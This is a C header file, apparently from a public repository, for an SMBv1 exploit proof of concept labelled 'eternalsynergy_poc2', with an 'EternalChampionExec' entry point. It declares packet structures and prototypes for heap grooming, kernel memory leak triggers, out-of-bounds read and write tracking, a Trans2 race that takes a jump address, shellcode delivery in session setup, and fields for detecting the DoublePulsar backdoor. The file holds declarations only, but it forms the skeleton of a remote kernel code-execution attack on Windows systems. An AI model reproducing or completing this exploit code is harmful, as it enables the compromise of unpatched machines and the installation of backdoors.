-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathsmb.h
434 lines (366 loc) · 13.6 KB
/
smb.h
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
#pragma once
#ifndef UNICODE
#define UNICODE
#endif
#include "smbtreeconnectandx.h"
#include <Windows.h>
#include <winternl.h>
#include <intrin.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <wchar.h>
#include <wincrypt.h>
#include "smbntcreateandx.h"
#include "smbpacketstrings.h"
#pragma intrinsic(memcpy, memset)
#pragma pack(push, 1)
typedef struct _SMB_HEADER {
BYTE Protocol[4];
BYTE Command;
union {
struct {
BYTE ErrorClass;
BYTE Reserved;
WORD Error;
}DosError;
DWORD NtStatus;
}Status;
BYTE Flags;
WORD Flags2;
union {
WORD Reserved[6];
struct {
WORD PidHigh;
union {
struct {
DWORD Key;
WORD Sid;
WORD SequenceNumber;
WORD Gid;
};
BYTE SecuritySignature[8];
};
};
};
WORD Tid;
WORD Pid;
WORD Uid;
WORD Mid;
}SMB_HEADER, * PSMB_HEADER;
#pragma pack(pop)
typedef struct _TRANSACTION_INFORMATION {
DWORD TotalParameterCount;
DWORD TotalDataCount;
DWORD MaxParameterCount;
DWORD MaxDataCount;
DWORD ParameterCount;
DWORD ParameterOffset;
DWORD DataDisplacement;
DWORD ParameterDisplacement;
DWORD DataCount;
DWORD DataOffset;
DWORD Timeout;
BYTE SetupCount;
BYTE WordCount;
WORD Function;
WORD PadingOffset;
WORD MaxSetupCount;
WORD ByteCountOffset;
}TRANSACTION_INFORMATION, * PTRANSACTION_INFORMATION;
typedef struct _WIN7_64_TRANS_INFO {
DWORD TRANS_SIZE;
DWORD TRANS_FLINK_OFFSET;
DWORD TRANS_INPARAM_OFFSET;
DWORD TRANS_OUTPARAM_OFFSET;
DWORD TRANS_INDATA_OFFSET;
DWORD TRANS_OUTDATA_OFFSET;
DWORD TRANS_PARAMCNT_OFFSET;
DWORD TRANS_TOTALPARAMCNT_OFFSET;
DWORD TRANS_FUNCTION_OFFSET;
DWORD TRANS_MID_OFFSET;
}WIN7_64_TRANS_INFO, * PWIN7_64_TRANS_INFO;
typedef struct _X64_INFO {
char ARCH[sizeof(DWORD)];
DWORD PTR_SIZE;
DWORD FRAG_TAG_OFFSET;
DWORD FRAG_POOL_SIZE;
DWORD POOL_ALIGN;
DWORD SRV_BUFHDR_SIZE;
}X64_INFO, * PX64_INFO;
struct smb_info {
WORD fid;
WORD tid;
WORD pid;
WORD uid;
WORD mid;
WORD special_mid;
WORD special_pid;
UNICODE_STRING tree_connection;
STRING tree_connect_andx_svc;
BYTE AndxCommand;
WORD AndxOffset;
PVOID sockaddrpointer;
PVOID socketpointer;
PVOID wsapointer;
DWORD_PTR connection_handle;
PVOID transrequestlist;
PVOID transresponselist;
PVOID currenttransreqentry;
PVOID currenttransrespentry;
DWORD srv_last_error;
BYTE headerinfo[32];
BOOL DoublePulsarInstalled;
WORD DoublePulsarXorKey;
WORD TransIndataShiftCount;
WORD TransFragTagOffset;
WORD TransConnectionOffset;
ULONG_PTR LastOOBReadAddress;
ULONG_PTR LastOOBWriteAddress;
TRANSACTION_INFORMATION* TransactionContext;
};
typedef struct BUFFER {
DWORD dwsize;
PBYTE pbdata;
}BUFWITHSIZE, * PBUFWITHSIZE;
struct LeakedDataLinkedList {
BUFFER KrnlLeakResponse;
PDWORD ResponseNetbios;
PSMB_HEADER ResponseHeader;
PBYTE ResponseParameters;
PBYTE ResponseData;
LeakedDataLinkedList* NextEntry;
};
struct ResponsePacketLinkedList {
BUFFER ThisPacket;
PSMB_HEADER ThisSmb;
PVOID ThisNetbiosSize; //(WORD *)
ResponsePacketLinkedList* NextEntry;
};
struct RequestPacketLinkedList {
BUFFER ThisPacket;
PSMB_HEADER ThisSmb;
PVOID ThisNetbiosSize; //(WORD *)
RequestPacketLinkedList* NextEntry;
};
#pragma pack(push, 1)
typedef struct ANYPOINTER {
union {
PVOID pvpointer;
PBYTE pbpointer;
PSTR ppointer;
const char* pccpointer;
PWSTR pwpointer;
const wchar_t* pcwpointer;
ULONG_PTR address;
ULONG_PTR* paddress;
BYTE addressbytes[sizeof(PVOID)];
};
}*PANYPOINTER;
//(unnamed) C union for processing and storing any type of SMB_COM_TRANSACTION request
typedef struct _ANYTRANSACTION_REQUEST {
union {
PVOID pvpointer;
PBYTE pbpointer;
ULONG_PTR address;
PREQ_TRANSACTION trans;
PREQ_TRANSACTION_SECONDARY transsecondary;
PREQ_TRANSACTION2 trans2;
PREQ_TRANSACTION2_SECONDARY trans2secondary;
PREQ_NT_TRANSACTION nttrans;
PREQ_NT_TRANSACTION_SECONDARY nttranssecondary;
};
}ANYTRANSACTION_REQUEST, * PANYTRANSACTION_REQUEST;
//(unnamed) C union for processing and storing any type of SMB_COM_TRANSACTION response
typedef struct _ANYTRANSACTION_RESPONSE {
union {
PVOID pvpointer;
PBYTE pbpointer;
ULONG_PTR address;
PRESP_TRANSACTION trans;
INT_PTR transsecondary;
PRESP_TRANSACTION2 trans2;
PRESP_TRANSACTION_INTERIM transinterim;
PRESP_NT_TRANSACTION nttrans;
INT_PTR nttranssecondary;
};
}ANYTRANSACTION_RESPONSE, * PANYTRANSACTION_RESPONSE;
#pragma pack(pop)
typedef struct TRANS_REQUEST_LIST {
ANYTRANSACTION_REQUEST transaction;
PSMB_HEADER smb;
DWORD transtype;
DWORD transactionfunction;
TRANS_REQUEST_LIST* Flink;
TRANS_REQUEST_LIST* Blink;
}*PTRANS_REQUEST_LIST;
typedef struct TRANS_RESPONSE_LIST {
ANYTRANSACTION_RESPONSE transaction;
PSMB_HEADER smb;
DWORD transtype;
DWORD transactionfunction;
TRANS_RESPONSE_LIST* Flink;
TRANS_RESPONSE_LIST* Blink;
}*PTRANS_RESPONSE_LIST;
typedef PBYTE(*packet_creation_handler_type_one)(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
typedef BOOLEAN(*SendRecvHandlerTypeOne)(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info IN* info);
typedef BOOLEAN(*SendRecvHandlerTypeTwo)(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, ULONGLONG IN address, SOCKET& IN s, smb_info* IN info);
typedef BUFFER* (*pfnbwsnew)(DWORD IN count);
typedef BOOL(*pfnbwsdelete)(BUFFER** IN OUT bws);
typedef BOOL(*pfnbwsallocateandcopy)(BUFFER IN OUT* bws, const void IN* src, DWORD IN size);
BOOL __cdecl __memcmp(const void* a, const void* b, DWORD size);
#define cpy(dst, src, size) (memcpy(dst, src, (size_t)(size)))
#define cmp(a, b, size) (__memcmp(a, b, size))
#define bzero(ptr, size) (memset((ptr), 0x00, (size_t)(size)))
BOOL find_memory_pattern(BUFFER IN* bws, PANYPOINTER IN OUT result, const void* IN pattern, DWORD IN patternsize);
VOID update_smb_info(smb_info* info, BUFFER* IN newpacket);
BOOL csprngcryptostartup(void);
BOOL csprngcryptoshutdown(void);
void csprng(PBYTE buffer, DWORD size);
unsigned int random(void);
BOOL __stdcall AllocateAndSetupTransactionReqList(TRANS_REQUEST_LIST** IN OUT listptr, DWORD IN count);
BOOL __stdcall AllocateAndSetupTransactionRespList(TRANS_RESPONSE_LIST** IN OUT listptr, DWORD IN count);
BOOL __stdcall FreeTransactionReqList(TRANS_REQUEST_LIST** IN OUT list);
BOOL __stdcall FreeTransactionRespList(TRANS_RESPONSE_LIST** IN OUT list);
BOOL __stdcall FillInTransRequestEntry(TRANS_REQUEST_LIST* entry, RequestPacketLinkedList* req);
BOOL __stdcall FillInTransResponseEntry(TRANS_RESPONSE_LIST* entry, ResponsePacketLinkedList* resp);
BOOL __stdcall SyncTransactionInfo(TRANSACTION_INFORMATION* transinfo, BUFFER* IN packet);
/*
*
*
* memory allocation buffer with size functions
*
*
*/
void bwsalloc(BUFFER OUT* bws, DWORD IN size);
void bwsfree(BUFFER IN* bws);
void bwscat(BUFFER IN OUT* dst, BUFFER IN* src);
/*
*
*
* Linked list functions
*
*
*/
void __stdcall FreeRequestLinkedListBuffers(RequestPacketLinkedList* IN OUT liststart, DWORD* IN ListElementCount);
void __stdcall FreeResponseLinkedListBuffers(ResponsePacketLinkedList* IN OUT liststart, DWORD* IN ListElementCount);
void __stdcall FreeLeakdataLinkedListBuffers(LeakedDataLinkedList* IN OUT liststart, DWORD* IN ListElementCount);
void __stdcall FreeRequestLinkedListSingleEntry(RequestPacketLinkedList* IN OUT entrypointer);
void __stdcall FreeResponseLinkedListSingleEntry(ResponsePacketLinkedList* IN OUT entry);
/*
*
*
* STRING functions
*
*
*/
void __stdcall InitString(PCSTR IN cstr, STRING* IN OUT str);
void __stdcall FreeString(STRING* IN OUT str);
void __stdcall InitUnicodeString(PCWSTR IN cstr, UNICODE_STRING* IN OUT str);
void __stdcall FreeUnicodeString(UNICODE_STRING* IN OUT str);
void __stdcall ConvertStringToUnicode(STRING* IN s, UNICODE_STRING* IN OUT u);
void __stdcall ConvertUnicodeToString(UNICODE_STRING* IN u, STRING* IN OUT s);
void DumpHex(const void* vdata, DWORD size);
WORD get_pid(smb_info*);
WORD get_uid(smb_info*);
WORD get_mid(smb_info*);
WORD get_tid(smb_info*);
WORD get_fid(smb_info*);
WORD get_special_mid(smb_info*);
WORD get_special_pid(smb_info*);
void set_pid(smb_info*, WORD);
void set_uid(smb_info*, WORD);
void set_mid(smb_info*, WORD);
void set_tid(smb_info*, WORD);
void set_fid(smb_info*, WORD);
void set_special_mid(smb_info*, WORD);
void set_special_pid(smb_info*, WORD);
/*
*
*
* networking functions
*
*
*/
unsigned int TargetConnect(SOCKET& s, sockaddr_in& sa, WSAData& wsa, const char* targetip, unsigned int& status);
unsigned int SendData(BUFFER IN OUT* bws, SOCKET& s, unsigned int& status);
unsigned int RecvData(BUFFER IN OUT* bws, DWORD IN bufsize, SOCKET& s, unsigned int& status);
unsigned int SmbRecvNetbiosSize(SOCKET& s, unsigned int& status);
unsigned int SmbRecv(BUFFER IN OUT* bws, SOCKET IN& s);
unsigned int SmbRecvTransaction(ResponsePacketLinkedList IN OUT* responselist, TRANS_RESPONSE_LIST IN OUT* transresponselist, SOCKET& IN s, WORD IN midoftransactiontofind);
/*
*
*
* begin smb packet creation functions
*
*
*/
/*
*
*
* eternalsynergy_poc2 packet creation functions
*
*
*/
PBYTE negotiate_request_packet(BUFFER* IN OUT bws, WORD pid, WORD uid, WORD mid, WORD tid);
PBYTE session_setup_packet(BUFFER IN OUT* bws, BUFFER IN * shellcode, WORD pid, WORD uid, WORD mid, WORD tid);
PBYTE tree_connect_packet(BUFFER IN OUT* bws, UNICODE_STRING* unc, WORD pid, WORD uid, WORD mid, WORD tid);
PBYTE nt_create_andx_packet(BUFFER IN OUT* bws, WORD rootfid, WORD pid, WORD uid, WORD mid, WORD tid);
PBYTE nt_create_andx_packet_custom(BUFFER IN OUT* bws, UNICODE_STRING *namedpipe, WORD pid, WORD uid, WORD mid, WORD tid);
PBYTE trans_groom_packet(BUFFER* IN OUT bws, WORD pid, WORD uid, WORD mid, WORD tid);
PBYTE nt_trans_nt_rename_packet(BUFFER* IN OUT bws, WORD pid, WORD uid, WORD mid, WORD tid);
PBYTE nt_trans_secondary_packet_sandwitch_packet(BUFFER* IN OUT bws, WORD pid, WORD uid, WORD mid, WORD tid);
PBYTE nt_trans_packet_sandwitch_leak_trigger(BUFFER* IN OUT bws, WORD pid, WORD uid, WORD mid, WORD tid);
PBYTE trans2_query_path_info_packet_sandwich_packet(BUFFER* IN OUT bws, ULONGLONG IN jmp_addr, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
/*
*
*
*
*
* SMB Disconnect networking functions
*
*
*
*/
PBYTE tree_disconnect_packet(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
PBYTE logoff_andx_packet(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
/*
*
*
* eternalsynergy_poc2 packet creation functions
*
*
*/
BOOLEAN SendRecvNegotiate(RequestPacketLinkedList OUT* outbound, ResponsePacketLinkedList OUT* inbound, SOCKET& s, smb_info* info);
BOOLEAN SendRecvSessionSetupAndx(RequestPacketLinkedList OUT* outbound, ResponsePacketLinkedList OUT* inbound, SOCKET& s, smb_info* info, BUFFER IN * shellcode);
BOOLEAN SendRecvTreeConnectAndx(RequestPacketLinkedList OUT* outbound, ResponsePacketLinkedList OUT* inbound, SOCKET& s, smb_info* info, PCWSTR IN ip);
BOOLEAN SendRecvNtCreateAndx(RequestPacketLinkedList* OUT outbound, ResponsePacketLinkedList OUT* inbound, SOCKET& s, smb_info* IN info);
BOOLEAN SendRecvTransGroomPacket(RequestPacketLinkedList* OUT outbound, ResponsePacketLinkedList OUT* inbound, SOCKET& s, smb_info* IN info);
BOOLEAN SendRecvNtTransNtRename(RequestPacketLinkedList* OUT outbound, ResponsePacketLinkedList OUT* inbound, SOCKET& s, smb_info* IN info);
BOOLEAN SendRecvNtTransSecondaryPacketSandwich(RequestPacketLinkedList* OUT outbound, ResponsePacketLinkedList OUT* inbound, SOCKET& s, smb_info* IN info);
BOOLEAN SendRecvTrans2QueryPathInfoPacketSandwich(RequestPacketLinkedList* OUT outbound, ResponsePacketLinkedList OUT* inbound, ULONGLONG IN jmp_addr, SOCKET& s, smb_info* IN info);
/*
*
*
*
*
* SMB Disconnect networking functions
*
*
*
*/
BOOLEAN SendRecvTreeDisconnect(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info);
BOOLEAN SendRecvLogoffAndx(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info);
/*
*
*
* eternalsynergy_poc2 threaded functions
*
*
*/
DWORD __stdcall EternalChampionExec(PVOID IN pvip_addr);
WORD __stdcall SmbTreeConnectAndx(RequestPacketLinkedList IN OUT* requestliststart, ResponsePacketLinkedList IN OUT* responseliststart, smb_info IN OUT* info, PCWSTR IN unicodeip, BUFFER IN * shellcode, BUFFER IN OUT* sentdata, BUFFER IN OUT* recieveddata);
WORD __stdcall SmbNtCreateAndx(RequestPacketLinkedList IN OUT* requestliststart, ResponsePacketLinkedList IN OUT* responseliststart, smb_info IN OUT* info, BUFFER IN OUT* sentdata, BUFFER IN OUT* recieveddata);
WORD __stdcall SmbTransactionGroomNtTransactionNtRenameLeak(RequestPacketLinkedList IN OUT* requestliststart, ResponsePacketLinkedList IN OUT* responseliststart, smb_info IN OUT* info, BUFFER IN OUT* sentdata, BUFFER IN OUT* recieveddata);
WORD __stdcall SmbTransaction2Race(RequestPacketLinkedList IN OUT* requestliststart, ResponsePacketLinkedList IN OUT* responseliststart, smb_info IN OUT* info, ULONGLONG IN jmp_addr, BUFFER IN OUT* sentdata, BUFFER IN OUT* recieveddata);
WORD __stdcall SmbDisconnectAndLogoff(RequestPacketLinkedList IN OUT* requestliststart, ResponsePacketLinkedList IN OUT* responseliststart, smb_info IN OUT* info, BUFFER IN OUT* sentdata, BUFFER IN OUT* recieveddata);